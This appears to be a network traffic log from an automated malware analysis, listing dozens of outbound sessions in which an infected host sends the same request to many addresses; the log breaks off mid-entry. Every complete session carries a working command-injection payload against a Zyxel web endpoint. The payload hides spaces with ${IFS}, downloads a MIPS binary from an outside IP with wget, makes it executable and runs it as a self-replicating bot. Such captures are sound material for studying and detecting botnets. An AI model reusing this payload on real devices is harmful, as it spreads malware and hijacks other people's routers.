                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6620192.168.2.1342624116.29.225.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666851044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6621192.168.2.1343594160.74.93.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666878939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6622192.168.2.1348694103.200.18.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666937113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6623192.168.2.1350606114.168.116.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666961908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6624192.168.2.1336174161.252.174.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.666990042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6625192.168.2.1346542102.18.96.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667045116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6626192.168.2.1335106172.189.90.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667129993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6627192.168.2.13508589.58.147.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667196989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6628192.168.2.133353489.205.11.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667227983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6629192.168.2.1337032213.61.137.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667268038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6630192.168.2.1343600170.161.125.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667296886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6631192.168.2.1356362155.201.12.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667351961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6632192.168.2.134222454.211.185.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667380095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6633192.168.2.134412036.66.156.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667408943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6634192.168.2.1358508184.114.54.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667440891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6635192.168.2.1359380201.228.253.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667500973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6636192.168.2.133826654.113.246.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667536974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6637192.168.2.133424093.207.253.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667591095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6638192.168.2.1338324147.183.241.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667642117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6639192.168.2.135598220.217.250.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667699099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6640192.168.2.134806468.2.165.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667747974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6641192.168.2.1358366185.159.167.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667798996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6642192.168.2.1359774135.103.92.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667824030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6643192.168.2.134103699.177.240.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667872906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6644192.168.2.1355656176.233.166.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667895079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6645192.168.2.13471225.128.59.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667967081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6646192.168.2.1340236196.250.101.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.667988062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6647192.168.2.1344326159.205.119.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668011904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6648192.168.2.1349086206.19.75.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668071985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6649192.168.2.1339414190.206.204.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668117046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6650192.168.2.135021682.67.231.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668139935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6651192.168.2.1357938188.184.92.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668189049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6652192.168.2.1341552211.9.32.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668229103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6653192.168.2.135083282.231.102.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668306112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6654192.168.2.135963863.32.158.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668313026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6655192.168.2.1350552181.158.66.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668359041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6656192.168.2.1342934107.147.121.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668414116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6657192.168.2.1360898149.66.209.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668452978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6658192.168.2.1360420102.105.183.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668493986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6659192.168.2.134424884.73.108.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668523073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6660192.168.2.134076081.222.67.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668590069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6661192.168.2.1345278101.214.87.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668616056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6662192.168.2.1345544128.192.68.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668667078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6663192.168.2.1333016105.117.114.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668735027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6664192.168.2.133335286.248.14.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668762922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6665192.168.2.133581632.127.160.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668790102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6666192.168.2.1348244171.170.11.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668839931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6667192.168.2.1333472216.116.139.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668895006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6668192.168.2.1359608151.104.97.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668920994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6669192.168.2.134552691.50.181.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.668975115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6670192.168.2.1347844192.10.0.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669015884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6671192.168.2.134284454.46.77.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669063091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6672192.168.2.13345962.155.68.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669101954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6673192.168.2.1333638143.74.178.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669142962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6674192.168.2.1333808180.218.151.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669194937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6675192.168.2.1344884130.47.105.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669226885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6676192.168.2.134193463.85.140.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669272900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6677192.168.2.136064450.201.141.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669334888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6678192.168.2.133325623.202.116.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669368982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6679192.168.2.1343202125.18.211.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669394970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6680192.168.2.133573612.30.198.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669425011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6681192.168.2.1339774208.6.24.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669471979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6682192.168.2.1357410169.101.45.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669517040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6683192.168.2.1334116208.150.216.90443
                                        TimestampBytes transferredDirectionData
